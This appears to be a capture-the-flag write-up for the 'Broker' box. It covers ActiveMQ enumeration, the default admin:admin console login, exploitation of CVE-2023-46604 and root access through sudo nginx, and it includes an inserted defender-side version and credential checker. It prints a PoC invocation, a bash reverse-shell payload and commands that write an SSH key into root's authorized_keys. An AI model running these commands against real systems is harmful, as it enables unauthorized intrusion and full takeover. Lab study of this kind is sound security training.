Broker
2023-12-18
  • Easy-rated box
  • Machine hosting an ActiveMQ server on port 61616

Enumeration

I’ll start off with an nmap scan to discover any open ports:

nmap -sV -p- 10.10.11.243

<img src=../../assets/broker_assets/1.jpg>

ActiveMQ running on port 61616 is what caught my attention, but I also wanted to know which version of ActiveMQ was running, so I ran nmap again with -sC. It turned out to be hosting ActiveMQ version 5.15.15.

<img src=../../assets/broker_assets/3.jpg>

I was also curious about port 8161, as it returned a 401 Unauthorized error. A quick search for the default credentials of ActiveMQ showed that the default login is admin:admin, which led me to a very interesting site.

<img src=../../assets/broker_assets/2.jpg> <img src=../../assets/broker_assets/4.jpg> <img src=../../assets/broker_assets/5.jpg>

I then searched for vulnerabilities in this specific version of ActiveMQ, and the first result was CVE-2023-46604, with a CVSS rating of 10.0.

<img src=../../assets/broker_assets/6.jpg>

I looked for a PoC and decided to use this one.
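As an added defender-side example (not code from the original write-up), the two findings above can be checked in code: whether an ActiveMQ version predates the builds patched for CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6, 5.18.3 and 6.0.0, per the Apache advisory), and whether the web console on 8161 still uses stock credentials; the jetty-realm.properties content is a constructed sample.

```python
"""Defender-side checks for the two weaknesses this box exposed: an
ActiveMQ build affected by CVE-2023-46604 and default web-console logins."""
import re

# Earliest patched release on each maintained 5.x branch (Apache advisory
# for CVE-2023-46604); 6.0.0 and later shipped with the fix.
FIXED_PATCH = {(5, 15): 16, (5, 16): 7, (5, 17): 6, (5, 18): 3}

def parse_version(text):
    """Pull a dotted ActiveMQ version (from a banner or pom) into a tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable_cve_2023_46604(version):
    """True when the release predates the fixed build on its branch."""
    major, minor, patch = parse_version(version)
    if major >= 6:
        return False
    if major < 5 or minor < 15:
        return True            # branches older than 5.15 never received a fix
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        return False           # 5.x branch that started after the fix
    return patch < fixed

def default_console_accounts(jetty_realm_text):
    """Usernames in conf/jetty-realm.properties whose password equals the
    username (the stock file ships with 'admin: admin, admin')."""
    hits = []
    for line in jetty_realm_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, rest = line.partition(":")
        password = rest.split(",")[0].strip()
        if password == user.strip():
            hits.append(user.strip())
    return hits

# Constructed sample modelled on the stock jetty-realm.properties file.
SAMPLE_REALM = """\
# username: password [,rolename ...]
admin: admin, admin
user: user, user
"""
```

On this box, is_vulnerable_cve_2023_46604("ActiveMQ 5.15.15") returns True and the stock realm file flags both admin and user.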

Exploitation

The PoC mentioned in the Enumeration section abuses a deserialization vulnerability in the Java OpenWire protocol in order to execute arbitrary shell commands. It also provides a malicious XML file which holds the commands executed on the remote server.

python3 exploit.py -i 10.10.11.243 -p 61616 -si <your-ip> -sp <your-port>

<img src=../../assets/broker_assets/7.jpg>

I then opened an nc listener to catch a reverse shell, using the following command as the payload:

bash -i >& /dev/tcp/<ip>/<port> 0>&1

<img src=../../assets/broker_assets/8.jpg>

Post Exploitation

Running sudo -l showed that the activemq user was allowed to run the nginx binary with sudo.

<img src=../../assets/broker_assets/9.jpg>

I created an nginx.conf that allows the PUT method and loaded it as the configuration file, which let me write to the authorized_keys file in root’s .ssh folder.

<img src=../../assets/broker_assets/10.jpg>

After creating the file, I loaded it with this command:

sudo nginx -c /tmp/nginx.conf

I then used curl to write my public key to root’s authorized_keys file in the .ssh folder:

curl -X PUT localhost:12345/root/.ssh/authorized_keys -d "<public-key>"

<img src=../../assets/broker_assets/11.jpg>

Lastly, I used my private key to SSH in as root:

ssh -i id_rsa root@10.10.11.243

<img src=../../assets/broker_assets/12.jpg>

Broker: https://fuwari.vercel.app/posts/broker/
Author: Balejin
Published at: 2023-12-18